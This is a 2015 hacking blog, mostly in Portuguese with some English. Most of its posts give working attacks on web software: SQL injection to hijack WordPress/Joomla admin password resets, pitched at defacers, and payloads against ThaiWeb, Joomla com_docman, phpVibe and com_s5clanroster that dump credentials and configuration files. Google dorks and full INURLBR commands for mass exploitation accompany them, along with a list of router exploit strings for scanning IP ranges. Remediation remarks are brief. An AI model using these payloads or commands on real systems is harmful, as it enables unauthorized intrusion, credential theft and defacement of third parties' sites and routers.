quinta-feira, 30 de julho de 2015

Resetando senha WORDPRESS/JOOMLA via SQL injection

[0x00] Introdução Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.


[0x00] Introdução

Bom vamos lá esse artigo é bem simples porem bem útil para gurizada que curte um defacement porém não possui muito conhecimento  e que passam um bom tempo ate conseguir "quebrar" um hash dessas CMS.

[0x01] Conceito Joomla

Não sei bem se podemos chamar de conceito porém esse termo se encaixa bem e se não me falha a memoria já vi um artigo similar em algum lugar só não me recordo o autor.

[0x01a] A Hash 
   A hash utilizada pelo Joomla é uma especie de MD5 que divide a senha em partes apos o : se o numero de caracteres for impar sera acrescentado um a mais na primeira md5.

[0x01b] Exemplo:
147c6577fd36d90147c4ee3a5a0cceaa:sWTeBV3KGXeCtb6ivBFXKBRhMIJE4O0 a parte em preto corresponde a 0X4 e a parte destacada em vermelho h4x

[0x02] Injeção 

É bem semelhante a uma injeção de SQL normal apenas mudamos as tabela e colunas que vão ser exploradas em um caso normal estaríamos atras de colunas responsável pelo armazenamento do nome de usuário e senha porém dessa vez buscaremos a tabela responsável pelos códigos de ativação e email.

[0x02b] Tabela alvo
 O alvo é _user o nome pode variar porem em 90% dos casos sempre possui _user e vamos pegar as colunas email e activation.
Pegaremos o email e o introduziremos em alvo.ru/index.php?option=com_user&view=reset apos isso é só colocar o código pego na coluna activation e será possível escolher uma nova senha.

[0x03] Conceito Wordpress

Não muda muita coisa da injeção em joomla apenas possui um tipo de hash ate o momento "desconhecida" 

[0x03a] Tabela alvo e colunas
                 a tabela alvo é wp_users e as colunas são user_login user_activation_key.

[0x03b] Resetando 
    é bem semelhante ao joomla apenas muda o caminho por trata se de CMS diferentes primeiro entraremos em alvo.ru/wp-login.php?action=lostpassword e colocaremos o usuário que desejamos mudar a senha usuário obtido na user_login apos isso entraremos em /wp-login.php?action=rp&key=l33ts&login=h4x0r.

[0x04] Explicação Wordpress

Bom creio que todos tenham entendido a parte l33ts e h4x0r mas para os desatentos onde possui l33ts na url você introduz o código correspondente obtido em user_activation_key e onde localiza se H4x0r é o usuário obtido em user_login.

Solução ?
Mantenha seu CMS sempre atualizado e informe-se sobre 
novas falhas .

Exploit exercises

     O Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest.


[0x00] Introdução
     O Exploit exercises é uma sequencia de desafios e documentações para auxiliar a garotada a obter conhecimento sobre diversas fases do pentest.

[0x01Como funciona ?
      O desafio é elaborado utilizando diversas VM (Virtuais Machines) e uma vasta gama de documentações e vídeo aulas.

[0x02Níveis
  [0x02a] Nebula
   O módulo Nebula inicialmente introduz problemas como buffer overflows escalação de privilegio em ambiente linux o nebula é ideal para iniciantes em escalação de privilegio.

 [0x02b] Protostar 
  O módulo Protostar é bem semelhante ao nebula o introduz a ordem de byte ao manuseio de sockets estouro de pilha sequencia de formato e a programação de rede.

 [0x02c] Fusion 
  O módulo Fusion nos introduz basicamente a criptografia e a variedade de protocolos.

 [0x02d] Main Sequence
  Modulo Main Sequence onde as coisas começam a ficar serias esse eu considero como um dos módulos mais decisivos pois o introduz a uma sequencia de testes utilizando ferramentas focadas em pentest como Metasploit SQLMAP além de analises binarias engenharia reversa analise de criptografia básica protocolos de rede além de pentest focado em WEB.

 [0x02e] Cloudroad
 Módulo final cloudroad era o nome do capture the flag realizado durante a ruxcon 2014 jogue e "seja" membro de uma organização ilegal que contrata espionagem empresarial escreva exploits e pratique engenharia reversa e muito mais infelizmente esse módulo ainda não encontra se disponível.

[0x03] Considerações finais 

Testei alguns módulos e todos se mostraram completamente capazes de fornecer um grande auxilio para garotada que quer passar o tempo ou simplesmente começar estudar  esse ramo.

[0x04Exploit exercises
 [0x04a] Download
               https://exploit-exercises.com/


sábado, 25 de julho de 2015

ThaiWeb CMS 2015Q3 - SQL Injection Web Vulnerability

Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.

Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.

THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage.
We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach.

We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard.
We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally.

Fail discovery by:
Iran Cyber Security Group - Pi.Hack (www.Iran-Cyber.Org)

Description:
The vulnerabilities are located in the id_run value of the `index.php` file. Remote attackers are able to execute own sql commands by manipulation of the GET method request with the vulnerable id_run parameter. The request method to inject the sql command is GET and the location of the issue is application-side.

References (Source):
http://www.vulnerability-lab.com/get_content.php?id=1555

Release Date:
2015-07-23

Vulnerability Laboratory ID (VL-ID):
1555

Common Vulnerability Scoring System:
8.6

Vendor Homepage:
http://www.thaiweb.net/

Google Dork:
"Powered by ThaiWeb"
"Reserved. Powered by Thaiweb."
inurl:"index.php" "Powered by Thaiweb"

PoC:
  • http://target/index.php?Content=product&id_run=[ID]'[SQL INJECTION VULNERABILITY!]
  • http://target/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user--

Admin Page:
www.target.com/_adminP/

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'YOU_DORK'
OR
--dork-file 'YOU_FILE_DORK.txt'

SET SEARCH ENGINES:
-a all
  we will use all the search engines available in the script

SET FILTER RESULTS:
 --unique
   Filter results in unique domains.
   removes all gets the URL

SET OUTPUT FILE:
 -s ThaiWeb.txt 

SET TIPE VALIDATION:
-t 2
       2   The second type tries to valid the error defined by: -a 'VALUE_INSIDE_THE _TARGET'
            It also establishes connection with the exploit through the get method.

SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:    hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330

--exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e
hex(:) = 3a

Example injection:
http://www.target.gov.br/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0x3a,pws,0x3a,0x696e75726c62725f76756c6e%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user

SET STRING VALIDATION:
Specify the string that will be used on the search script:
     Example: -a {string}
     Usage:    -a '<title>hello world</title>'
     If specific value is found in the target he is considered vulnerable.
     Setting:   -a 'inurlbr_vuln'

Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

OUTPUT PRINT:
Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

ADMIN PAINEL:
ADMIN PAINEL - Exploring cms THAIWEB with sql injection then we will use inurlbr scanner for mass exploitation.   THAIWEB.network is a network since Nov 1998, and reborn again in Aug 2003. We provide stable servers for our own usage. We are located in Bangkok Thailand. Our systems are based on UNIX system and opensource approach.  We believe in sharing knowledge, and we hope our knowledge will help everyone developing and becoming a higher standard. We hope to see Thai web builders upgrading themselves to become a professional living in the big world of internet internationally.

COMMAND FULL:
php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'

OUTPUT PRINT:
COMMAND FULL: php inurlbr.php --dork '"Powered by ThaiWeb"' -s ThaiWeb.txt -q all -t 2 --unique -a 'inurlbr_vuln' --exploit-get '/index.php?Content=product&id_run=-12+union+select+1,2,3,group_concat%28user,0xhex(:),pws,0xhex(:),0xhex(inurlbr_vuln)%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+user'  OUTPUT PRINT:


Source discovery: 
http://seclists.org/fulldisclosure/2015/Jul/109

Solution - Fix & Patch:
The security vulnerability can be patched by a secure parse and encode of the vulnerable id_run parameter value in the index.php file.
Restrict the input and use a prepared statement to secure the sql statement request via GET method.

How to Avoid SQL Injection Vulnerabilities
See the OWASP SQL Injection Prevention Cheat Sheet.
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
See the OWASP Query Parameterization Cheat Sheet.
https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet
See the OWASP Guide article on how to Avoid SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Guide_Project
https://www.owasp.org/index.php/Guide_to_SQL_Injection

How to Review Code for SQL Injection Vulnerabilities
See the OWASP Code Review Guide article on how to Review Code for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Code_Review_Project
https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

How to Test for SQL Injection Vulnerabilities
See the OWASP Testing Guide article on how to Test for SQL Injection Vulnerabilities.
https://www.owasp.org/index.php/Category:OWASP_Testing_Project
https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

segunda-feira, 20 de julho de 2015

INURLBR searching for routers

In this short article we will use the INURLBR tool for searching routers in certain ip ranges. 

The tool has methods that generate IP ranges or X amount of ip random. Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.  Download tool INURLBR: https://github.com/googleinurl/SCANNER-INURLBR  SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.  We will use methods get and validate if the request was successfully executed retonando code 200. There will be no exploitation, let's just filtering routers.  Creating SUB_PROCESS file First we must create our file with the exploration of strings that will be used by SUB_PROCESS Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

The tool has methods that generate IP ranges or X amount of ip random.
Separated several exploits routers, so we can use the method of INURLBR tool called SUB_PROCESS
SUB_PROCESS - Consiste em concatenar uma serie de strings com base de um arquivo predefinido.

Download tool INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

SUB_PROCESS - consists of a series of concatenate strings on the basis of a predefined file. With concatenation process made the tool sends the request against its target to make possible the validation.

We will use methods get and validate if the request was successfully executed retonando code 200.
There will be no exploitation, let's just filtering routers.

Creating SUB_PROCESS file
First we must create our file with the exploration of strings that will be used by SUB_PROCESS
Primeiro devemos criar nosso arquivo com as strings de exploração que serão usadas pelo SUB_PROCESS.

File content:
/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/dvr/wwwroot/user.cgi
/web_cgi.cgi?&request=UploadFile&path=/etc/
/dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
/dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
/dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=$3
/html/tUserAccountControl.htm
/common/info.cgi
/hedwig.cgi
/tools_admin.asp
/hnap.cgi
/scdmz.cmd?&fwFlag=50853375&dosenbl=1
/cliget.cgi?cmd=help
/scgi-bin/platform.cgi
/soap.cgi
/dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
/command.php
/authentication.cgi

Each line of the file will be concatenated with the IP target thus effecting request testing to validate that return code http.
Cada linha do arquivo será concatenada com o alvo IP assim efetuando teste de request para validar se retorno do código http.

Example:
http://TARGET/{STRING_SUB_PROCESS}

http://200.16.3.***/dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1/dns_1?
http://200.16.3.***/tools_admin.asp

If the HTTP server return code 200 means that such a request has been successfully performed.
Se o código http do servidor retornar 200 significa que tal requisição foi efetuada com sucesso.

if(HTTP_CODE == 200){

VULN

}
Now let's create our command to run the tool INURLBR.
By setting command:

SET RANGE IP:
RANGE IP:
 --range Set range IP.
      Example: --range {range_start,rage_end}
      Usage:   --range '172.16.0.5,172.16.0.255'

OR

RANGE IP RANDOM:
 --range-rand Set amount of random ips.
      Example: --range-rand {rand}
      Usage:   --range-rand '50'

SET FILE OUTPUT:
-s vuln.txt

SET FILE SUB_PROCESS:
--sub-file  Subprocess performs an injection 
     strings in URLs found by the engine, via GET or POST.
     Example: --sub-file {youfile}
     Usage:   --sub-file exploits_get.txt

SET TYPE OF REQUEST -  SUB_PROCESS:
 --sub-get defines whether the strings coming from 
     --sub-file will be injected via GET.
     Usage:   --sub-get

SET VALIDATION HTTP CODE:
 --ifcode Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:   --ifcode 200

SET TIME-OUT:
 --time-out Timeout to exit the process.
      Example: --time-out {second}
      Usage:   --time-out 3

COMPLETE COMMAND:
php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt  --sub-file 'string_exploits.txt' --sub-get --ifcode 200

print output:
COMPLETE COMMAND: php inurlbr.php --range '172.1.0.1,172.1.0.163' -s vuln.txt  --sub-file 'string_exploits.txt' --sub-get --ifcode 200  print output:

Strings exploits used:

All exploits cited already have packages fix.

Exploit_model: Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
http://www.exploit-db.com/exploits/35995/

Exploit_model: D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
STRING GET: /dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
http://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
http://1337day.com/exploit/23302/

Exploit_model: LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
STRING GET: /dvr/wwwroot/user.cgi
http://www.exploit-db.com/exploits/36014/

Exploit_model: D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities
STRING GET: /web_cgi.cgi?&request=UploadFile&path=/etc/
https://www.exploit-db.com/exploits/37454/

Exploit_model: D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.4.4&dnsIfcsList=&dnsRefresh=1
https://www.exploit-db.com/exploits/37237/

Exploit_model: D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change
STRING GET: /dnscfg.cgi?dnsPrimary=8.8.8.8&dnsSecondary=8.8.4.4&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=
https://www.exploit-db.com/exploits/37240/

Exploit_model: D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change
STRING GET: /dnscfg.cgi?dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1
https://www.exploit-db.com/exploits/37241/

Exploit_model: D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit
STRING GET: /ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP
https://www.exploit-db.com/exploits/36105/

Exploit_model: D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit
STRING GET: /Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=8.8.4.4&dnsSecondary=8.8.8.8
https://www.exploit-db.com/exploits/35917/

Exploit_model: D-Link AP 3200 - Multiple Vulnerabilities
STRING GET: /html/tUserAccountControl.htm
https://www.exploit-db.com/exploits/34206/

Exploit_model: D-Link info.cgi POST Request Buffer Overflow
STRING GET: /common/info.cgi
https://www.exploit-db.com/exploits/34063/

Exploit_model: D-Link hedwig.cgi Buffer Overflow in Cookie Header
STRING GET: /hedwig.cgi
https://www.exploit-db.com/exploits/33863/

Exploit_model: DGL-5500, DIR-855L and the DIR-835:
STRING GET: /tools_admin.asp
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link models DGL-5500, DIR-855L, DIR-835 suffer
STRING GET: /hnap.cgi
https://www.exploit-db.com/exploits/33520/

Exploit_model: D-Link DSL-2750B ADSL Router - CSRF Vulnerability
STRING GET: /scdmz.cmd?&fwFlag=50853375&dosenbl=1
https://www.exploit-db.com/exploits/31569/

Exploit_model: D-Link DIR-100 - Multiple Vulnerabilities
STRING GET: /cliget.cgi?cmd=help
https://www.exploit-db.com/exploits/31425/

Exploit_model: D-Link DSR Router Series - Remote Root Shell Exploit
STRING GET: /scgi-bin/platform.cgi
https://www.exploit-db.com/exploits/30062/

Exploit_model: D-Link Devices UPnP SOAP Telnetd Command Execution
STRING GET: /soap.cgi
https://www.exploit-db.com/exploits/28333/

Exploit_model: D-Link DIR-505 1.06 - Multiple Vulnerabilities
STRING GET: /dws/api/ListFile?id=admin&tok=&volid=1&path=usb_dev/usb_A1/../../../../etc
https://www.exploit-db.com/exploits/28184/

Exploit_model: D-Link Devices Unauthenticated Remote Command Execution
STRING GET: /command.php
https://www.exploit-db.com/exploits/27528/

Exploit_model: D-Link DIR-645 1.03B08 - Multiple Vulnerabilities
STRING GET: /authentication.cgi
https://www.exploit-db.com/exploits/27283/

quarta-feira, 15 de julho de 2015

Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)

Exploring component of Joomla cms


# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI) # CWE: CWE-200(FPD) CWE-98(LFI/LFD) # Risk: High # Author: Hugo Santiago dos Santos # Contact: hugo.s@linuxmail.org # Date: 13/07/2015 # Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman https://www.exploit-db.com/exploits/37620/


# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
https://www.exploit-db.com/exploits/37620/

There is a get parameter untreated in the application "file=" which enables download files from the server.

Google Dork:
inurl:"/components/com_docman/dl2.php"

POC:
http://www.site.com/components/com_docman/dl2.php?archive=0&file=base64([LDF])

Internment such an application must use the native function of php base64_decode to access your files.

string base64_decode ( string $data [, bool $strict = false ] );
more http://php.net/manual/en/function.base64-decode.php

The application uses crypt 64 then we should do the same to get the server files.

injection string:
../../../../../../../target/www/configuration.php <= Not Ready

encoded string:

Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !

Example
http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR
- Creating our command

SET DORK:
--dork 'inurl:"/components/com_docman/dl2.php"'

SET OUTPUT FILE:
 -s dl2.txt 

SET EXPLOIT GET
To encode our injection string we use a ineterna function of inurlbr script.
 base64 Encrypt values in base64.
     Example: base64({value})
     Usage:    base64(102030)
     Usage:
      --exploit-get 'user?id=base64(102030)'
  URL with inject get:
  http://www.target.us/user?id=MTAyMDMw
Use:
--exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'

OR USE SITE ENCODER: https://www.base64encode.org/
Use:
--exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='

SET FILTER 
Filter results in unique domains.
--unique

SET VALIDATION
Valid results based on your return http code.
      Example: --ifcode {ifcode}
      Usage:    --ifcode 200

COMPLETE COMMAND:
php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=base64(../../../../../../../target/www/configuration.php)'  --unique --ifcode 200

OR

php inurlbr.php --dork 'inurl:"/components/com_docman/dl2.php"' -s dl2.txt  --exploit-get '/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA=='  --unique --ifcode 200


Remediation:
The most effective solution to eliminate file inclusion vulnerabilities is to avoid passing user-submitted input to any filesystem/framework API. If this is not possible the application can maintain a white list of files, that may be included by the page, and then use an identifier (for example the index number) to access to the selected file. Any request containing an invalid identifier has to be rejected, in this way there is no attack surface for malicious users to manipulate the path.
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
https://www.owasp.org/index.php/Full_Path_Disclosure

segunda-feira, 13 de julho de 2015

phpVibe ALL versions LFD vulnerability Exploring with inurlbr

LFD exploiting vulnerability in phpvibe

PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine
PHPVibe - A php video script built for sharing video and media. PHPVibe video sharing cms: php video embed and video upload script, ffmpeg video conversion, Youtube,Vine

# Exploit Title: phpVibe ALL versions LFD vulnerability
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions
# Tested on: linux
http://0day.today/exploit/23877

Vulnerable file:
stream.php

POC:
http://target.tld/stream.php?file=../vibe_config.php@@media
http://target.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09

Code:
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));

File parameter has no validation and sanitization!
exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed).
With simple request can get access to the database configuration file Mysql.

Example:
curl  'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'

OUTPUT PRINT:
 Example: curl  'http://TARGET/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'

Using inurlbr scanner for mass exploitation:
 Download script: https://github.com/googleinurl/SCANNER-INURLBR

- Creating our command

SET DORK:
--dork '"powered by phpvibe"'

SET OUTPUT FILE:
 -s telefone.txt 

SET EXPLOIT GET
--exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09'

SET FILTER 
Filter results in unique domains.
--unique 

SET VALIDATION
Valid results based on your return http code. 
      Example: --ifcode {ifcode}
      Usage:    --ifcode 200

COMPLETE COMMAND:
php inurlbr.php --dork '"powered by phpvibe"' -s telefone.txt  --exploit-get '/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09' --unique --ifcode 200

OUTPUT PRINT:

Solution:
Improving validation of parameters passed to the application.

segunda-feira, 6 de julho de 2015

Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit

EXPLOIT MASS Joomla  - com_s5clanroster

USE INURLBR

In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.  The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.

In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.

The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information.

DORK:
inurl:"index.php?option=com_s5clanroster"

SQL INJECTION:
%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-

POC:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null{SQL INJECTION}

With access to this information we put together our command for mass exploitation.
Let's use the scanner inurlbr: 
http://github.com/googleinurl/SCANNER-INURLBR

SET DORK:
--dork 'inurl:"index.php?option=com_s5clanroster"'

SET FILE OUTPUT:
-s vuln.log

SET TIPE VALIDATION:
-t 3
       3   - The third type combine both first and second types:
              Then, of course, it also establishes connection with the exploit through the get method
              Demo: www.target.com.br{exploit}


SET EXPLOIT REQUEST - GET:
--exploit-get {YOU_GET}

Before setting the exploit we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.

Internal function - Converting strings in hexadecimal
 hex Encrypt values in hex.
     Example: hex({value})
     Usage:   hex(102030)
     Usage:   --exploit-get 'user?id=hex(102030)'
     Result inject:
     http://www.target.gov.br/user?id=313032303330


--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'

hex(inurlbr_vuln) = 696e75726c62725f76756c6e 
hex(<br>) = 3c62723e
Example injection:
http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x696e75726c62725f76756c6e,username,password,0x3c62723e),222+from+jos_users--%20-'

SET STRING VALIDATION:
Specify the string that will be used on the search script:
Example: -a {string}
Usage:   -a '<title>hello world</title>'
If specific value is found in the target he is considered vulnerable.
Setting:   -a 'inurlbr_vuln'
Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.
SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage:   -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'inurlbr_vuln' Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.

COMMAND FULL:
php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'
-a 'inurlbr_vuln'

PRINT PROCESS:
COMMAND FULL: php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-'  PRINT PROCESS:

Cifra de César

  #Cifra de César em Python


   Neste ultimo fim de semana, eu estava pesquisando sobre uma organização chamada Cicada 3301 que tem como principal objetivo o recrutamento de usuários altamente inteligentes em todo o mundo para um objetivo totalmente desconhecido. Uma espécie de (quebra-cabeça, desafio, enigma) ou como você quiser chamar era o método de recrutamento da Cicada 3301 (Mas informações). Pesquisando sobre os tipos de desafios que a cicada utilizava, um deles era codificação de mensagens usando a clássica Cifra de César (Júlio César a usava para passar informações confidenciais nos tempos de Roma).     A Cifra de César era basicamente o seguinte, Era a substituição das letras da mensagem a ser criptografada por seus sucessores no alfabeto de acordo com a sua chave.

 Eae seus putos, jh00n aqui novamente com vocês.

   Neste ultimo fim de semana, eu estava pesquisando sobre uma organização chamada Cicada 3301 que tem como principal objetivo o recrutamento de usuários altamente inteligentes em todo o mundo para um objetivo totalmente desconhecido. Uma espécie de (quebra-cabeça, desafio, enigma) ou como você quiser chamar era o método de recrutamento da Cicada 3301 (Mas informações). Pesquisando sobre os tipos de desafios que a cicada utilizava, um deles era codificação de mensagens usando a clássica Cifra de César (Júlio César a usava para passar informações confidenciais nos tempos de Roma).

   A Cifra de César era basicamente o seguinte, Era a substituição das letras da mensagem a ser criptografada por seus sucessores no alfabeto de acordo com a sua chave.

  •  Criptografando
            Chave 3
            Alfabeto: "abcdefghijklmnopqrstuvwxyz"
            Mensagem a ser criptografada: "aka"

            Neste caso você conta 3(Chave) casas a frente das letras "a","k","a" ficando assim: dnd.
  •  Descriptografando
            Chave 3
            Mensagem a ser descriptografada: "dnd"

